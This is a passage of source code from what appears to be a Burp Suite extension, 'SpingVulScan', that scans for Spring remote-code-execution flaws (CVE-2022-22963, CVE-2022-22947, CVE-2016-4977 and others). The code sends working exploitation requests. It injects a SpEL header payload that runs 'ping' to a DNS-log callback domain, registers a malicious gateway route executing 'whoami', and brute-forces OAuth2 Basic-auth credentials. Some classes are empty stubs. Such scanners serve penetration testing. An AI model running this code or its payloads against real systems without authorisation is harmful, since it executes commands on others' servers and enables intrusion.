this.burpExtender.stdout.println("===========================检测完毕!不存在:Spring Cloud Framework 远程代码执行漏洞(CVE-2022-22965)==========================="); 156 | return null; 157 | } 158 | 159 | public IHttpRequestResponse export() { 160 | return this.updataHttp; 161 | } 162 | } 163 | -------------------------------------------------------------------------------- /SpingVulScan-1.0/src/main/java/burp/payload/RCE/CloudFuncionSpEl.java: -------------------------------------------------------------------------------- 1 | package burp.payload.RCE; 2 | 3 | import burp.BurpExtender; 4 | import burp.IExtensionHelpers; 5 | import burp.IHttpRequestResponse; 6 | import burp.IHttpService; 7 | import burp.IParameter; 8 | import burp.IRequestInfo; 9 | import burp.IScanIssue; 10 | import burp.SpringIssue; 11 | import burp.DnsLog.DnsLogInterface; 12 | import burp.auxiliary.CheckIsSpring; 13 | import burp.auxiliary.YamlReader; 14 | import burp.payload.Payload; 15 | import java.io.FileNotFoundException; 16 | import java.net.MalformedURLException; 17 | import java.net.URL; 18 | import java.util.Arrays; 19 | import java.util.List; 20 | 21 | public class CloudFuncionSpEl implements Payload { 22 | private BurpExtender burpExtender; 23 | private IExtensionHelpers helpers; 24 | private CheckIsSpring checkIsSpring; 25 | private YamlReader yamlReader; 26 | private DnsLogInterface dnsLogPlatform; 27 | private IHttpRequestResponse updataHttp; 28 | 29 | public CloudFuncionSpEl(BurpExtender burpExtender, IExtensionHelpers helpers, CheckIsSpring checkIsSpring) throws FileNotFoundException { 30 | this.burpExtender = burpExtender; 31 | this.burpExtender.stdout.println("===========================正在测试是否存在:Spring Cloud Function SpEL表达式命令注入(CVE-2022-22963)==========================="); 32 | this.helpers = helpers; 33 | this.checkIsSpring = checkIsSpring; 34 | this.yamlReader = new YamlReader(this.burpExtender); 35 | } 36 | 37 | private byte[] action(IHttpRequestResponse httpRequestResponse, String key, String value) { 38 | try { 39 | IRequestInfo requestInfo = this.helpers.analyzeRequest(httpRequestResponse); 40 | byte[] rawRequest = httpRequestResponse.getRequest(); 41 | List headers = requestInfo.getHeaders(); 42 | headers.add(key + ":" + value); 43 | headers.set(0, ((String)headers.get(0)).replace("GET", "POST")); 44 | headers.removeIf((header) -> { 45 | return header != null && header.toLowerCase().startsWith("content-type:"); 46 | }); 47 | headers.add("Content-type: application/x-www-form-urlencoded"); 48 | rawRequest = (new String(rawRequest)).substring(requestInfo.getBodyOffset()).getBytes(); 49 | IParameter param = this.helpers.buildParameter(this.checkIsSpring.randomStr(6), "1", (byte)1); 50 | return this.helpers.addParameter(this.helpers.buildHttpMessage(headers, rawRequest), param); 51 | } catch (Exception var8) { 52 | var8.printStackTrace(); 53 | this.burpExtender.stderr.println(var8.getMessage()); 54 | return null; 55 | } 56 | } 57 | 58 | public IScanIssue doCheckVul(IHttpRequestResponse httpRequestResponse, DnsLogInterface dnsLogPlatform) { 59 | this.dnsLogPlatform = dnsLogPlatform; 60 | String dnsLog = this.dnsLogPlatform.getTempDomain(); 61 | boolean is500 = false; 62 | IHttpService httpService = httpRequestResponse.getHttpService(); 63 | this.helpers.analyzeRequest(httpRequestResponse); 64 | List payloads = (List)this.yamlReader.getValueByKey("CloudFuncionSpEl.payloads"); 65 | if (this.burpExtender.tags.getSettingUi().isReverseCheck()) { 66 | String[] payload = ((String)payloads.get(0)).split(":"); 67 | String[] payload2 = ((String)payloads.get(1)).split(":"); 68 | String key = payload[0]; 69 | String value1 = String.format(payload[1], dnsLog); 70 | String value2 = String.format(payload2[1], "ping " + dnsLog); 71 | byte[] resp1 = this.action(httpRequestResponse, key, value1); 72 | byte[] resp2 = this.action(httpRequestResponse, key, value2); 73 | this.burpExtender.stdout.println("[*] 正在测试payload: " + Arrays.toString(payload) + "\n" + Arrays.toString(payload2)); 74 | 75 | try { 76 | IHttpRequestResponse httpRequestResponse1 = this.burpExtender.callbacks.makeHttpRequest(httpService, resp1); 77 | IHttpRequestResponse httpRequestResponse2 = this.burpExtender.callbacks.makeHttpRequest(httpService, resp2); 78 | is500 = this.helpers.analyzeResponse(httpRequestResponse1.getResponse()).getStatusCode() == 500 || this.helpers.analyzeResponse(httpRequestResponse2.getResponse()).getStatusCode() == 500; 79 | IRequestInfo requestInfo = this.helpers.analyzeRequest(httpRequestResponse2); 80 | byte[] frRequest = this.helpers.buildHttpRequest(new URL(httpService.getProtocol(), httpService.getHost(), httpService.getPort(), this.checkIsSpring.getUri(requestInfo.getUrl().toString()) + "functionRouter")); 81 | IHttpRequestResponse frRequestResponse = this.burpExtender.callbacks.makeHttpRequest(httpService, frRequest); 82 | if (this.helpers.analyzeResponse(frRequestResponse.getResponse()).getStatusCode() != 404) { 83 | resp1 = this.action(frRequestResponse, key, value1); 84 | resp2 = this.action(frRequestResponse, key, value2); 85 | httpRequestResponse1 = this.burpExtender.callbacks.makeHttpRequest(httpRequestResponse.getHttpService(), resp1); 86 | httpRequestResponse2 = this.burpExtender.callbacks.makeHttpRequest(httpRequestResponse.getHttpService(), resp2); 87 | requestInfo = this.helpers.analyzeRequest(httpRequestResponse2); 88 | is500 = this.helpers.analyzeResponse(httpRequestResponse1.getResponse()).getStatusCode() == 500 || this.helpers.analyzeResponse(httpRequestResponse2.getResponse()).getStatusCode() == 500; 89 | } 90 | 91 | if (is500) { 92 | this.burpExtender.stdout.println("[*] 回连检测是否存在 Spring Cloud Function SpEL RCE for: " + requestInfo.getUrl().toString() + " ..."); 93 | 94 | for(int i = 0; i < 3; ++i) { 95 | if (this.dnsLogPlatform.checkResult()) { 96 | this.updataHttp = httpRequestResponse2; 97 | this.burpExtender.stdout.println("[+] 存在回连!存在漏洞!!!!"); 98 | this.burpExtender.stdout.println("===========================检测完毕!存在:Spring Cloud Function SpEL表达式命令注入(CVE-2022-22963)漏洞 ===========================\n"); 99 | return new SpringIssue(requestInfo.getUrl(), "Spring Cloud Function SpEL RCE", 0, "High", "Certain", (String)null, (String)null, "(Maybe) URI: '/functionRouter'\nHeaders: '" + key + ":" + value1 + "\n'or'\n" + key + ":" + value2 + "'\nTest dnsllog platform information:\n" + this.dnsLogPlatform.outExport(), (String)null, new IHttpRequestResponse[]{httpRequestResponse2}, httpRequestResponse2.getHttpService()); 100 | } 101 | 102 | try { 103 | Thread.sleep(10000L); 104 | } catch (InterruptedException var21) { 105 | this.burpExtender.stderr.println(var21.getMessage()); 106 | } 107 | } 108 | } 109 | } catch (MalformedURLException var22) { 110 | var22.printStackTrace(); 111 | this.burpExtender.stderr.println(var22.getMessage()); 112 | } catch (InterruptedException var23) { 113 | var23.printStackTrace(); 114 | } 115 | } 116 | 117 | this.burpExtender.stdout.println("===========================检测完毕!不存在:Spring Cloud Function SpEL表达式命令注入(CVE-2022-22963)漏洞 ===========================\n"); 118 | return null; 119 | } 120 | 121 | public IHttpRequestResponse export() { 122 | return this.updataHttp; 123 | } 124 | } 125 | -------------------------------------------------------------------------------- /SpingVulScan-1.0/src/main/java/burp/payload/RCE/CloudGatewaySpEl.java: -------------------------------------------------------------------------------- 1 | package burp.payload.RCE; 2 | 3 | import burp.BurpExtender; 4 | import burp.IExtensionHelpers; 5 | import burp.IHttpRequestResponse; 6 | import burp.IHttpService; 7 | import burp.IRequestInfo; 8 | import burp.IResponseInfo; 9 | import burp.IScanIssue; 10 | import burp.SpringIssue; 11 | import burp.DnsLog.DnsLogInterface; 12 | import burp.auxiliary.CheckIsSpring; 13 | import burp.auxiliary.YamlReader; 14 | import burp.payload.Payload; 15 | import java.io.FileNotFoundException; 16 | import java.net.MalformedURLException; 17 | import java.net.URL; 18 | import java.util.ArrayList; 19 | import java.util.List; 20 | 21 | public class CloudGatewaySpEl implements Payload { 22 | private BurpExtender burpExtender; 23 | private IExtensionHelpers helpers; 24 | private CheckIsSpring checkIsSpring; 25 | private YamlReader yamlReader; 26 | private IHttpRequestResponse updataHttp; 27 | 28 | public CloudGatewaySpEl(BurpExtender burpExtender, IExtensionHelpers helpers, CheckIsSpring checkIsSpring) throws FileNotFoundException { 29 | this.burpExtender = burpExtender; 30 | this.burpExtender.stdout.println("===========================正在测试是否存在:Spring Cloud Gateway Actuator API SpEL表达式注入命令执行(CVE-2022-22947)==========================="); 31 | this.helpers = helpers; 32 | this.checkIsSpring = checkIsSpring; 33 | this.yamlReader = new YamlReader(this.burpExtender); 34 | } 35 | 36 | public IScanIssue doCheckVul(IHttpRequestResponse httpRequestResponse, DnsLogInterface dnsLogPlatform) { 37 | URL url = this.helpers.analyzeRequest(httpRequestResponse).getUrl(); 38 | String uri = this.checkIsSpring.getUri(url.toString()); 39 | String random_uri = this.checkIsSpring.randomStr(5); 40 | if (this.CloudGatewayRegisterRoute(httpRequestResponse, uri, random_uri, "whoami")) { 41 | this.burpExtender.stdout.print("[*] 添加新路由完成!"); 42 | if (this.CloudGatewayRefresh(httpRequestResponse, uri)) { 43 | this.burpExtender.stdout.print("+++新路由刷新完成!"); 44 | IHttpRequestResponse requestResponse = this.CloudGatewayRoute(httpRequestResponse, uri, random_uri, false); 45 | if (requestResponse != null) { 46 | this.burpExtender.stdout.print("+++新路由检测完成!"); 47 | this.CloudGatewayRoute(httpRequestResponse, uri, random_uri, true); 48 | this.CloudGatewayRefresh(httpRequestResponse, uri); 49 | } 50 | 51 | this.updataHttp = requestResponse; 52 | this.burpExtender.stdout.println("[+] 存在漏洞!!!!"); 53 | this.burpExtender.stdout.println("===========================检测完毕!存在:Spring Cloud Gateway Actuator API SpEL表达式注入命令执行(CVE-2022-22947)漏洞 ===========================\n"); 54 | 55 | assert requestResponse != null; 56 | 57 | return new SpringIssue(url, "Spring Cloud GateWay SPEL RCE", 0, "High", "Certain", (String)null, (String)null, "vul! ! After detection, there is a vulnerability. The test route has been deleted. Please retest and exploit this vulnerability!", (String)null, new IHttpRequestResponse[]{requestResponse}, requestResponse.getHttpService()); 58 | } 59 | } 60 | 61 | this.burpExtender.stdout.println("===========================检测完毕!不存在:Spring Cloud Gateway Actuator API SpEL表达式注入命令执行(CVE-2022-22947)漏洞 ===========================\n"); 62 | return null; 63 | } 64 | 65 | private boolean CloudGatewayRegisterRoute(IHttpRequestResponse httpRequestResponse, String uri, String random_uri, String cmd) { 66 | IHttpService service = httpRequestResponse.getHttpService(); 67 | List payloads = (List)this.yamlReader.getValueByKey("CloudGatewaySpEl.payloads"); 68 | String poc = (String)payloads.get(0); 69 | String payload = this.helpers.bytesToString(this.helpers.base64Decode(poc)); 70 | payload = String.format(payload, random_uri, cmd); 71 | this.burpExtender.stdout.println("[*] 正在测试payload: " + payload); 72 | IRequestInfo requestInfo1 = this.helpers.analyzeRequest(httpRequestResponse); 73 | List headers = requestInfo1.getHeaders(); 74 | if (((String)headers.get(0)).contains("HTTP/1.1")) { 75 | headers.set(0, "POST /actuator/gateway/routes/" + random_uri + " HTTP/1.1"); 76 | } else { 77 | headers.set(0, "POST /actuator/gateway/routes/" + random_uri + " HTTP/2"); 78 | } 79 | 80 | headers.removeIf((header) -> { 81 | return header != null && header.toLowerCase().startsWith("content-type:"); 82 | }); 83 | headers.add("Content-type: application/json"); 84 | byte[] newRequest = this.helpers.buildHttpMessage(headers, this.helpers.stringToBytes(payload)); 85 | IHttpRequestResponse requestResponse = this.burpExtender.callbacks.makeHttpRequest(service, newRequest); 86 | IResponseInfo responseInfo1 = this.helpers.analyzeResponse(requestResponse.getResponse()); 87 | this.burpExtender.stdout.println("响应状态码:" + responseInfo1.getStatusCode()); 88 | return responseInfo1.getStatusCode() == 201; 89 | } 90 | 91 | private boolean CloudGatewayRefresh(IHttpRequestResponse httpRequestResponse, String uri) { 92 | try { 93 | IHttpService service = httpRequestResponse.getHttpService(); 94 | byte[] refreshRequest = this.helpers.buildHttpRequest(new URL(service.getProtocol(), service.getHost(), service.getPort(), uri + "actuator/gateway/refresh")); 95 | List headers = new ArrayList(); 96 | headers.add("POST " + uri + "actuator/gateway/refresh HTTP/1.1"); 97 | headers.add("Host: " + service.getHost() + ":" + service.getPort()); 98 | headers.add("User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0"); 99 | headers.add("Accept-Encoding: gzip, deflate"); 100 | headers.add("Accept: */*"); 101 | headers.add("Content-Type: application/x-www-form-urlencoded"); 102 | headers.add("Connection: close"); 103 | IRequestInfo requestInfo = this.helpers.analyzeRequest(service, refreshRequest); 104 | refreshRequest = (new String(refreshRequest)).substring(requestInfo.getBodyOffset()).getBytes(); 105 | byte[] newRequest = this.helpers.buildHttpMessage(headers, refreshRequest); 106 | IHttpRequestResponse requestResponse = this.burpExtender.callbacks.makeHttpRequest(service, newRequest); 107 | IResponseInfo responseInfo1 = this.helpers.analyzeResponse(requestResponse.getResponse()); 108 | if (responseInfo1.getStatusCode() == 200) { 109 | return true; 110 | } 111 | } catch (MalformedURLException var10) { 112 | var10.printStackTrace(); 113 | this.burpExtender.stderr.println(var10.getMessage()); 114 | } 115 | 116 | return false; 117 | } 118 | 119 | private IHttpRequestResponse CloudGatewayRoute(IHttpRequestResponse httpRequestResponse, String uri, String random_uri, boolean deleteRoute) { 120 | try { 121 | IHttpService service = httpRequestResponse.getHttpService(); 122 | byte[] refreshRequest = this.helpers.buildHttpRequest(new URL(service.getProtocol(), service.getHost(), service.getPort(), uri + "actuator/gateway/routes/" + random_uri)); 123 | List headers = new ArrayList(); 124 | headers.add((deleteRoute ? "DELETE " : "GET ") + uri + "actuator/gateway/routes/" + random_uri + " HTTP/1.1"); 125 | headers.add("Host: " + service.getHost() + ":" + service.getPort()); 126 | headers.add("User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0"); 127 | headers.add("Accept-Encoding: gzip, deflate"); 128 | headers.add("Accept: */*"); 129 | headers.add("Content-Type: application/x-www-form-urlencoded"); 130 | headers.add("Connection: close"); 131 | IRequestInfo requestInfo = this.helpers.analyzeRequest(service, refreshRequest); 132 | refreshRequest = (new String(refreshRequest)).substring(requestInfo.getBodyOffset()).getBytes(); 133 | byte[] newRequest = this.helpers.buildHttpMessage(headers, refreshRequest); 134 | IHttpRequestResponse requestResponse = this.burpExtender.callbacks.makeHttpRequest(service, newRequest); 135 | byte[] rawResponse = requestResponse.getResponse(); 136 | IResponseInfo responseInfo1 = this.helpers.analyzeResponse(rawResponse); 137 | String strResponse = this.helpers.bytesToString(rawResponse); 138 | if (responseInfo1.getStatusCode() == 200 && strResponse.contains(random_uri) && strResponse.contains("Result")) { 139 | return requestResponse; 140 | } 141 | } catch (MalformedURLException var14) { 142 | var14.printStackTrace(); 143 | this.burpExtender.stderr.println(var14.getMessage()); 144 | } 145 | 146 | return null; 147 | } 148 | 149 | public IHttpRequestResponse export() { 150 | return this.updataHttp; 151 | } 152 | } 153 | -------------------------------------------------------------------------------- /SpingVulScan-1.0/src/main/java/burp/payload/RCE/DataCommons.java: -------------------------------------------------------------------------------- 1 | package burp.payload.RCE; 2 | 3 | import burp.BurpExtender; 4 | import burp.IHttpRequestResponse; 5 | import burp.IScanIssue; 6 | import burp.DnsLog.DnsLogInterface; 7 | import burp.payload.Payload; 8 | 9 | public class DataCommons implements Payload { 10 | private BurpExtender burpExtender; 11 | private IHttpRequestResponse updataHttp; 12 | 13 | public DataCommons(BurpExtender burpExtender) { 14 | this.burpExtender = burpExtender; 15 | } 16 | 17 | public IScanIssue doCheckVul(IHttpRequestResponse iHttpRequestResponse, DnsLogInterface dnsLogPlatform) { 18 | return null; 19 | } 20 | 21 | public IHttpRequestResponse export() { 22 | return this.updataHttp; 23 | } 24 | } 25 | -------------------------------------------------------------------------------- /SpingVulScan-1.0/src/main/java/burp/payload/RCE/MessagingRCE.java: -------------------------------------------------------------------------------- 1 | package burp.payload.RCE; 2 | 3 | import burp.BurpExtender; 4 | import burp.IHttpRequestResponse; 5 | import burp.IScanIssue; 6 | import burp.DnsLog.DnsLogInterface; 7 | import burp.payload.Payload; 8 | 9 | public class MessagingRCE implements Payload { 10 | private BurpExtender burpExtender; 11 | private IHttpRequestResponse updataHttp; 12 | 13 | public MessagingRCE(BurpExtender burpExtender) { 14 | this.burpExtender = burpExtender; 15 | } 16 | 17 | public IScanIssue doCheckVul(IHttpRequestResponse iHttpRequestResponse, DnsLogInterface dnsLogPlatform) { 18 | return null; 19 | } 20 | 21 | public IHttpRequestResponse export() { 22 | return this.updataHttp; 23 | } 24 | } 25 | -------------------------------------------------------------------------------- /SpingVulScan-1.0/src/main/java/burp/payload/RCE/SecurityOAuth2RCE.java: -------------------------------------------------------------------------------- 1 | package burp.payload.RCE; 2 | 3 | import burp.BurpExtender; 4 | import burp.IExtensionHelpers; 5 | import burp.IHttpRequestResponse; 6 | import burp.IHttpService; 7 | import burp.IRequestInfo; 8 | import burp.IResponseInfo; 9 | import burp.IScanIssue; 10 | import burp.SpringIssue; 11 | import burp.DnsLog.DnsLogInterface; 12 | import burp.auxiliary.CheckIsSpring; 13 | import burp.auxiliary.YamlReader; 14 | import burp.payload.Payload; 15 | import java.io.FileNotFoundException; 16 | import java.net.URL; 17 | import java.util.Arrays; 18 | import java.util.List; 19 | 20 | public class SecurityOAuth2RCE implements Payload { 21 | private BurpExtender burpExtender; 22 | private IExtensionHelpers helpers; 23 | private CheckIsSpring checkIsSpring; 24 | private YamlReader yamlReader; 25 | private IHttpRequestResponse updataHttp; 26 | 27 | public SecurityOAuth2RCE(BurpExtender burpExtender, IExtensionHelpers helpers, CheckIsSpring checkIsSpring) throws FileNotFoundException { 28 | this.burpExtender = burpExtender; 29 | this.burpExtender.stdout.println("===========================正在测试是否存在:Spring Security OAuth2 远程命令执行漏洞(CVE-2016-4977)==========================="); 30 | this.helpers = helpers; 31 | this.checkIsSpring = checkIsSpring; 32 | this.yamlReader = new YamlReader(this.burpExtender); 33 | } 34 | 35 | public IScanIssue doCheckVul(IHttpRequestResponse httpRequestResponse, DnsLogInterface dnsLogPlatform) { 36 | URL url = this.helpers.analyzeRequest(httpRequestResponse).getUrl(); 37 | List payloads = (List)this.yamlReader.getValueByKey("SecurityOAuth2RCE.payloads"); 38 | String[] usernames = ((String)payloads.get(0)).substring(9).split(","); 39 | String[] passwords = ((String)payloads.get(1)).substring(9).split(","); 40 | String payload = (String)payloads.get(2); 41 | this.burpExtender.stdout.println("用户名:" + Arrays.toString(usernames) + "\n密码:" + Arrays.toString(passwords) + "\npayload:" + payload); 42 | String[] var8 = usernames; 43 | int var9 = usernames.length; 44 | 45 | for(int var10 = 0; var10 < var9; ++var10) { 46 | String username = var8[var10]; 47 | String[] var12 = passwords; 48 | int var13 = passwords.length; 49 | 50 | for(int var14 = 0; var14 < var13; ++var14) { 51 | String password = var12[var14]; 52 | String up = this.helpers.base64Encode(username + ":" + password); 53 | IHttpRequestResponse requestResponse = this.makeRequest(httpRequestResponse, payload, up); 54 | IResponseInfo responseInfo1 = this.helpers.analyzeResponse(requestResponse.getResponse()); 55 | this.burpExtender.stdout.println("响应状态码:" + responseInfo1.getStatusCode()); 56 | String body = (new String(requestResponse.getResponse())).substring(this.helpers.analyzeResponse(requestResponse.getResponse()).getBodyOffset()).toLowerCase(); 57 | if (body.contains("response types: [4]")) { 58 | this.updataHttp = requestResponse; 59 | this.burpExtender.stdout.println("===========================检测完毕!存在:Spring Security OAuth2 远程命令执行漏洞(CVE-2016-4977)漏洞 ===========================\n"); 60 | return new SpringIssue(url, "Spring Security OAuth2 RCE", 0, "High", "Certain", (String)null, (String)null, "There is a vulnerability, but you need other tools to take advantage of it!", (String)null, new IHttpRequestResponse[]{requestResponse}, requestResponse.getHttpService()); 61 | } 62 | 63 | if (responseInfo1.getStatusCode() == 401) { 64 | this.burpExtender.stdout.println("===========================检测完毕!可能存在:Spring Security OAuth2 远程命令执行漏洞(CVE-2016-4977)漏洞 ===========================\n"); 65 | this.updataHttp = requestResponse; 66 | return new SpringIssue(url, "Spring Security OAuth2 RCE", 0, "Medium", "Certain", (String)null, (String)null, "There may be a vulnerability because the same authentication failed", (String)null, new IHttpRequestResponse[]{requestResponse}, requestResponse.getHttpService()); 67 | } 68 | } 69 | } 70 | 71 | this.burpExtender.stdout.println("===========================检测完毕!不存在:Spring Security OAuth2 远程命令执行漏洞(CVE-2016-4977)漏洞 ===========================\n"); 72 | return null; 73 | } 74 | 75 | private IHttpRequestResponse makeRequest(IHttpRequestResponse httpRequestResponse, String payload, String up) { 76 | IRequestInfo requestInfo = this.helpers.analyzeRequest(httpRequestResponse); 77 | List headers = requestInfo.getHeaders(); 78 | if (((String)headers.get(0)).contains("HTTP/1.1")) { 79 | headers.set(0, "GET " + payload + " HTTP/1.1"); 80 | } else { 81 | headers.set(0, "GET " + payload + " HTTP/2"); 82 | } 83 | 84 | headers.add("Authorization: Basic " + up); 85 | IHttpService service = httpRequestResponse.getHttpService(); 86 | byte[] newRequest = this.helpers.buildHttpMessage(headers, this.helpers.stringToBytes(payload)); 87 | return this.burpExtender.callbacks.makeHttpRequest(service, newRequest); 88 | } 89 | 90 | public IHttpRequestResponse export() { 91 | return this.updataHttp; 92 | } 93 | } 94 | -------------------------------------------------------------------------------- /SpingVulScan-1.0/src/main/java/burp/payload/RCE/WebFlowRCE.java: -------------------------------------------------------------------------------- 1 | package burp.payload.RCE; 2 | 3 | import burp.BurpExtender; 4 | import burp.IHttpRequestResponse; 5 | import burp.IScanIssue; 6 | import burp.DnsLog.DnsLogInterface; 7 | import burp.payload.Payload; 8 | 9 | public class WebFlowRCE implements Payload { 10 | private BurpExtender burpExtender; 11 | private IHttpRequestResponse updataHttp; 12 | 13 | public WebFlowRCE(BurpExtender burpExtender) { 14 | this.burpExtender = burpExtender; 15 | } 16 | 17 | public IScanIssue doCheckVul(IHttpRequestResponse iHttpRequestResponse, DnsLogInterface dnsLogPlatform) { 18 | return null; 19 | } 20 | 21 | public IHttpRequestResponse export() { 22 | return this.updataHttp; 23 | } 24 | } 25 | -------------------------------------------------------------------------------- /SpingVulScan-1.0/src/main/java/burp/payload/ScanPayload.java: -------------------------------------------------------------------------------- 1 | package burp.payload; 2 | 3 | import burp.BurpExtender; 4 | import burp.IExtensionHelpers; 5 | import burp.IHttpRequestResponse; 6 | import burp.IScanIssue; 7 | import burp.DnsLog.DnsLogInterface; 8 | import burp.DnsLog.Platform.BurpCollaborator; 9 | import burp.DnsLog.Platform.DnsLogCn; 10 | import burp.auxiliary.CheckIsSpring; 11 | import burp.payload.RCE.APIunauthorized; 12 | import burp.payload.RCE.CloudFramework; 13 | import burp.payload.RCE.CloudFuncionSpEl; 14 | import burp.payload.RCE.CloudGatewaySpEl; 15 | import burp.payload.RCE.SecurityOAuth2RCE; 16 | import java.io.FileNotFoundException; 17 | import java.util.Objects; 18 | 19 | public class ScanPayload { 20 | private int isVul; 21 | private IScanIssue vulDetails; 22 | private BurpExtender burpExtender; 23 | private IExtensionHelpers helpers; 24 | private String vulId; 25 | private CheckIsSpring checkIsSpring; 26 | private DnsLogInterface dnsLogPlatform; 27 | private IHttpRequestResponse vulHttp; 28 | 29 | public ScanPayload(BurpExtender burpExtender, IExtensionHelpers helpers, IHttpRequestResponse iHttpRequestResponse) throws FileNotFoundException, InterruptedException { 30 | this.burpExtender = burpExtender; 31 | this.helpers = helpers; 32 | this.vulId = this.burpExtender.tags.getSettingUi().getVulId(); 33 | this.checkIsSpring = new CheckIsSpring(this.burpExtender, this.helpers); 34 | this.isVul = -1; 35 | this.initDnslog(); 36 | this.init(iHttpRequestResponse); 37 | } 38 | 39 | private void init(IHttpRequestResponse iHttpRequestResponse) throws FileNotFoundException { 40 | if (this.vulId.contains("ALL")) { 41 | this.checkApi(iHttpRequestResponse); 42 | this.check22_22965(iHttpRequestResponse); 43 | this.check22_22963(iHttpRequestResponse); 44 | this.check22_22947(iHttpRequestResponse); 45 | this.check18_1273(iHttpRequestResponse); 46 | this.check18_1270(iHttpRequestResponse); 47 | this.check17_4971(iHttpRequestResponse); 48 | this.check16_4977(iHttpRequestResponse); 49 | } else if (this.vulId.contains("CVE-2016-4977")) { 50 | this.check16_4977(iHttpRequestResponse); 51 | } else if (this.vulId.contains("CVE-2017-4971")) { 52 | this.check17_4971(iHttpRequestResponse); 53 | } else if (this.vulId.contains("CVE-2018-1270")) { 54 | this.check18_1270(iHttpRequestResponse); 55 | } else if (this.vulId.contains("CVE-2018-1273")) { 56 | this.check18_1273(iHttpRequestResponse); 57 | } else if (this.vulId.contains("CVE-2022-22947")) { 58 | this.check22_22947(iHttpRequestResponse); 59 | } else if (this.vulId.contains("CVE-2022-22963")) { 60 | this.check22_22963(iHttpRequestResponse); 61 | } else if (this.vulId.contains("CVE-2022-22965")) { 62 | this.check22_22965(iHttpRequestResponse); 63 | } else { 64 | this.checkApi(iHttpRequestResponse); 65 | } 66 | 67 | } 68 | 69 | public void check22_22965(IHttpRequestResponse iHttpRequestResponse) throws FileNotFoundException { 70 | CloudFramework cloudFramework = new CloudFramework(this.burpExtender, this.helpers, this.checkIsSpring); 71 | IScanIssue scfIssue = cloudFramework.doCheckVul(iHttpRequestResponse, this.dnsLogPlatform); 72 | if (scfIssue != null) { 73 | this.vulHttp = cloudFramework.export(); 74 | this.vulDetails = scfIssue; 75 | if (Objects.equals(scfIssue.getSeverity(), "Medium")) { 76 | this.isVul = 0; 77 | } else if (Objects.equals(scfIssue.getSeverity(), "High")) { 78 | this.isVul = 1; 79 | } 80 | } 81 | 82 | } 83 | 84 | public void check22_22963(IHttpRequestResponse iHttpRequestResponse) throws FileNotFoundException { 85 | CloudFuncionSpEl cloudFuncionSpEl = new CloudFuncionSpEl(this.burpExtender, this.helpers, this.checkIsSpring); 86 | IScanIssue spelIssue = cloudFuncionSpEl.doCheckVul(iHttpRequestResponse, this.dnsLogPlatform); 87 | if (spelIssue != null) { 88 | this.vulHttp = cloudFuncionSpEl.export(); 89 | this.vulDetails = spelIssue; 90 | this.isVul = 1; 91 | } 92 | 93 | } 94 | 95 | public void check22_22947(IHttpRequestResponse iHttpRequestResponse) throws FileNotFoundException { 96 | CloudGatewaySpEl cloudGatewaySpEl = new CloudGatewaySpEl(this.burpExtender, this.helpers, this.checkIsSpring); 97 | IScanIssue spelIssue = cloudGatewaySpEl.doCheckVul(iHttpRequestResponse, this.dnsLogPlatform); 98 | if (spelIssue != null) { 99 | this.vulHttp = cloudGatewaySpEl.export(); 100 | this.vulDetails = spelIssue; 101 | this.isVul = 1; 102 | } 103 | 104 | } 105 | 106 | public void check18_1273(IHttpRequestResponse iHttpRequestResponse) throws FileNotFoundException { 107 | } 108 | 109 | public void check17_4971(IHttpRequestResponse iHttpRequestResponse) throws FileNotFoundException { 110 | } 111 | 112 | public void check16_4977(IHttpRequestResponse iHttpRequestResponse) throws FileNotFoundException { 113 | SecurityOAuth2RCE SecurityOAuth2RCE = new SecurityOAuth2RCE(this.burpExtender, this.helpers, this.checkIsSpring); 114 | IScanIssue spelIssue = SecurityOAuth2RCE.doCheckVul(iHttpRequestResponse, this.dnsLogPlatform); 115 | if (spelIssue != null) { 116 | this.vulDetails = spelIssue; 117 | this.vulHttp = SecurityOAuth2RCE.export(); 118 | if (Objects.equals(spelIssue.getSeverity(), "Medium")) { 119 | this.isVul = 0; 120 | } else if (Objects.equals(spelIssue.getSeverity(), "High")) { 121 | this.isVul = 1; 122 | } 123 | } 124 | 125 | } 126 | 127 | public void check18_1270(IHttpRequestResponse iHttpRequestResponse) throws FileNotFoundException { 128 | } 129 | 130 | public void checkApi(IHttpRequestResponse iHttpRequestResponse) throws FileNotFoundException { 131 | APIunauthorized apIunauthorized = new APIunauthorized(this.burpExtender, this.helpers, this.checkIsSpring); 132 | IScanIssue spelIssue = apIunauthorized.doCheckVul(iHttpRequestResponse, this.dnsLogPlatform); 133 | this.vulHttp = apIunauthorized.export(); 134 | if (spelIssue != null) { 135 | this.vulDetails = spelIssue; 136 | this.isVul = 0; 137 | } 138 | 139 | } 140 | 141 | private void initDnslog() throws InterruptedException { 142 | String backendSelected = this.burpExtender.tags.getSettingUi().getBackendPlatform().toString(); 143 | byte var3 = -1; 144 | switch(backendSelected.hashCode()) { 145 | case -1244747625: 146 | if (backendSelected.equals("BurpCollaborator")) { 147 | var3 = 0; 148 | } 149 | break; 150 | case 459123526: 151 | if (backendSelected.equals("DnsLogCn")) { 152 | var3 = 1; 153 | } 154 | } 155 | 156 | switch(var3) { 157 | case 0: 158 | this.dnsLogPlatform = new BurpCollaborator(this.burpExtender.callbacks); 159 | break; 160 | case 1: 161 | this.dnsLogPlatform = new DnsLogCn(this.burpExtender); 162 | } 163 | 164 | } 165 | 166 | public IHttpRequestResponse getVulHttp() { 167 | return this.vulHttp; 168 | } 169 | 170 | public int getIsVul() { 171 | return this.isVul; 172 | } 173 | 174 | public IScanIssue getVulDetails() { 175 | return this.vulDetails; 176 | } 177 | } 178 | --------------------------------------------------------------------------------